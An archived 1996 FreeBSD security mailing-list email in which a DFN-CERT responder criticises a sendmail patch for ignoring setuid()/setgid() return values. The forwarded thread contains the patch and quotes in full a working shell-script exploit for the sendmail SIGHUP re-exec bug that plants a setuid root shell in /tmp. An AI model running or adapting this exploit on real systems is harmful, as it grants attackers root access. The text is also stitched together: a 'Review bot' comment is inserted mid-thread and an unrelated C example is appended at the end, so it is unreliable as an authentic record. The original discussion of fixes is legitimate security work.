From owner-freebsd-security Sat Nov 16 11:47:58 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA15202 for security-outgoing; Sat, 16 Nov 1996 11:47:58 -0800 (PST)
Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA15194; Sat, 16 Nov 1996 11:47:50 -0800 (PST)
Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.2/8.8.2) with ESMTP id UAA14556; Sat, 16 Nov 1996 20:49:00 +0100 (MET)
From: Wolfgang Ley
Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.2/8.8.2) id UAA09254; Sat, 16 Nov 1996 20:48:59 +0100 (MET)
Message-Id: <199611161948.UAA09254@tiger.cert.dfn.de>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
To: cschuber@uumail.gov.bc.ca
Date: Sat, 16 Nov 1996 20:48:58 +0100 (MET)
Cc: security-officer@FreeBSD.org, freebsd-security@FreeBSD.org
In-Reply-To: <199611161927.LAA04262@cwsys.cwent.com> from "Cy Schubert" at Nov 16, 96 11:27:28 am
Organization: DFN-CERT (Computer Emergency Response Team, Germany)
Content-Type: text
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

Cy Schubert wrote:
>
> This appears to be a better fix, and it works too.

May work... Why do people ignore return values? Especially of such
important calls like setgid() and setuid()? *bad* idea...

By the way: Eric Allman has produced a much better fix. I expect it to
be publicly available very shortly.

Bye,
Wolfgang.

- --
Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany
Email: ley@cert.dfn.de    Phone: +49 40 5494-2262    Fax: +49 40 5494-2241
PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via
WWW from http://www.cert.dfn.de/~ley/                  ...have a nice day

>
>
> Regards,                          Phone:  (604)389-3827
> Cy Schubert                       OV/VM:  BCSC02(CSCHUBER)
> Open Systems Support              BITNET: CSCHUBER@BCSC02.BITNET
> ITSD                              Internet: cschuber@uumail.gov.bc.ca
>                                             cschuber@bcsc02.gov.bc.ca
>
> "Quit spooling around, JES do it."
>
> ------- Forwarded Message
>
> Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA23212 for cy; Sat, 16 Nov 1996 08:40:16 -0800 (PST)
> X-UIDL: 848169128.001
> Resent-From: Cy Schubert - ITSD Open Systems Group
> Resent-Message-Id: <199611161640.IAA23212@passer.osg.gov.bc.ca>
> Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA22021 for ; Sat, 16 Nov 1996 08:40:15 -0800 (PST)
> Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4) id AA02926; Sat, 16 Nov 1996 08:40:13 -0800
> Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id IAA02623; Sat, 16 Nov 1996 08:38:55 -0800 (PST)
> Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id DAA30954; Sun, 17 Nov 1996 03:35:59 +1100
> Prev-Resent-Date: Sun, 17 Nov 1996 03:35:59 +1100
> Old-X-Envelope-From: cjs@portal.ca Sun Nov 17 03:27:52 1996
> X-Authentication-Warning: didactic.cynic.net: cjs owned process doing -bs
> Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST)
> From: Curt Sampson
> X-Sender: cjs@didactic
> To: Leshka Zakharoff
> Cc: best-of-security@suburbia.net
> In-Reply-To: <199611160110.EAA04168@leshka.chuvashia.su>
> Message-Id:
> Mime-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Approved: proff@suburbia.net
> Prev-Resent-Message-Id: <"2hTZt3.0.dZ7.krUZo"@suburbia>
> Prev-Resent-From: best-of-security@suburbia.net
> X-Mailing-List: archive/latest/509
> X-Loop: best-of-security@suburbia.net
> Precedence: list
> Prev-Resent-Sender: best-of-security-request@suburbia.net
> Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
> Resent-To: cy@uumail.gov.bc.ca
> Resent-Date: Sat, 16 Nov 96 08:40:16 -0800
> Resent-XMts: smtp
>
>
> Huh. Yet another gaping hole, can you believe it? This is entirely
> platform-independent, and has not yet been fixed in 8.2.2. Here's
> the patch to fix it. This was done on 8.7.6; the line numbers may
> differ in other versions but the patch is the same.
>
> - ------------------------------------------------------
> - --- main.c.old Mon Sep 16 12:56:01 1996
> +++ main.c Fri Nov 15 23:56:48 1996
> @@ -1693,14 +1693,16 @@
> sighup()
> {
> #ifdef LOG
> if (LogLevel > 3)
> syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]);
> #endif
> releasesignal(SIGHUP);
> + (void) setgid(RealGid);
> + (void) setuid(RealUid);
> execv(SaveArgv[0], (ARGV_T) SaveArgv);
> #ifdef LOG
> if (LogLevel > 0)
> syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]);
> #endif
> exit(EX_OSFILE);
> }
> - ------------------------------------------------------
>
> Now who the heck do I send this to to get it back into sendmail? There
> are no e-mail addresses listed for bug reports in the READ_ME file, or
> anywhere else for that matter.
>
> cjs
>
> Curt Sampson            cjs@portal.ca           Info at http://www.portal.ca/
> Internet Portal Services, Inc.
> Vancouver, BC  (604) 257-9400       De gustibus, aut bene aut nihil.
>
> On Sat, 16 Nov 1996, Leshka Zakharoff wrote:
>
> > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK)
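Review bot: the two added lines `(void) setgid(RealGid);` and `(void) setuid(RealUid);` discard their return values, so if either call fails (setuid() can fail with EAGAIN on systems that enforce a per-user process limit, for instance) control still reaches `execv(SaveArgv[0], (ARGV_T) SaveArgv);` with root privilege intact, which is precisely the state the exploit below depends on. Check both results and fail closed before the exec, reusing the logging and exit pattern the function already has for a failed exec, e.g. `if (setgid(RealGid) < 0 || setuid(RealUid) < 0) { syslog(LOG_ALERT, "could not drop privileges: %m"); exit(EX_OSERR); }`. The order (group before user) is right, since setgid() would no longer be permitted once the uid is non-zero.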
> > From: Leshka Zakharoff
> > To: best-of-security@suburbia.net
> > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
> > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100
> > Resent-From: best-of-security@suburbia.net
> >
> > #-------------------------------- CUT HERE -------------------------------------
> > #/bin/sh
> > #
> > #
> > #   Hi !
> > #   This is exploit for sendmail smtpd bug
> > #   (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
> > #   This shell script does a root shell in /tmp directory.
> > #   If you have any problems with it, drop me a letter.
> > #   Have fun !
> > #
> > #
> > #   ----------------------
> > #   ---------------------------------------------
> > #   ----------------- Dedicated to my beautiful lady ------------------
> > #   ---------------------------------------------
> > #   ----------------------
> > #
> > #   Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
> > #
> > #
> > #
> > echo 'main() '>>leshka.c
> > echo '{ '>>leshka.c
> > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
> > echo '} '>>leshka.c
> > #
> > #
> > echo 'main() '>>smtpd.c
> > echo '{ '>>smtpd.c
> > echo ' setuid(0); setgid(0); '>>smtpd.c
> > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
> > echo '} '>>smtpd.c
> > #
> > #
> > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
> > ./leshka
> > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
> > rm leshka.c leshka smtpd.c /tmp/smtpd
> > /tmp/sh
> > #-------------------------------- CUT HERE -------------------------------------
> >
> >
> >
>
> ------- End of Forwarded Message
>
>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----
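An added example, not part of this thread and not sendmail's own code: the two-line privilege drop from the patch above written the way Wolfgang's objection demands, with both return values checked, the drop verified with the get*id() calls, and the re-exec refused when the drop fails. The function names and the nonexistent demo path are constructed for the example.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Drop to gid, then uid, checking every return value and then verifying
 * the result with get*id() rather than trusting the drop.
 * Group first: once the uid is no longer 0, setgid() would be refused.
 * With root privilege, POSIX setuid()/setgid() set the real, effective
 * and saved ids together, so the privilege cannot be regained later.
 * Returns 0 on a verified drop, -1 otherwise (errno left as set). */
int drop_privs(uid_t uid, gid_t gid)
{
    if (setgid(gid) != 0) {
        fprintf(stderr, "setgid(%lu) failed: %s\n",
                (unsigned long)gid, strerror(errno));
        return -1;
    }
    if (setuid(uid) != 0) {
        fprintf(stderr, "setuid(%lu) failed: %s\n",
                (unsigned long)uid, strerror(errno));
        return -1;
    }
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid) {
        fprintf(stderr, "privilege drop did not take effect\n");
        return -1;
    }
    return 0;
}

/* The shape a sighup()-style re-exec takes with the checks in place:
 * the exec happens only after a verified drop. Fails closed and returns
 * -1 instead of exec'ing when the drop (or the exec itself) fails;
 * on success it does not return at all. */
int reexec_unprivileged(char *const argv[], uid_t uid, gid_t gid)
{
    if (drop_privs(uid, gid) != 0)
        return -1;             /* never reach execv() still privileged */
    execv(argv[0], argv);
    fprintf(stderr, "could not exec %s: %s\n", argv[0], strerror(errno));
    return -1;                 /* execv() only returns on failure */
}
```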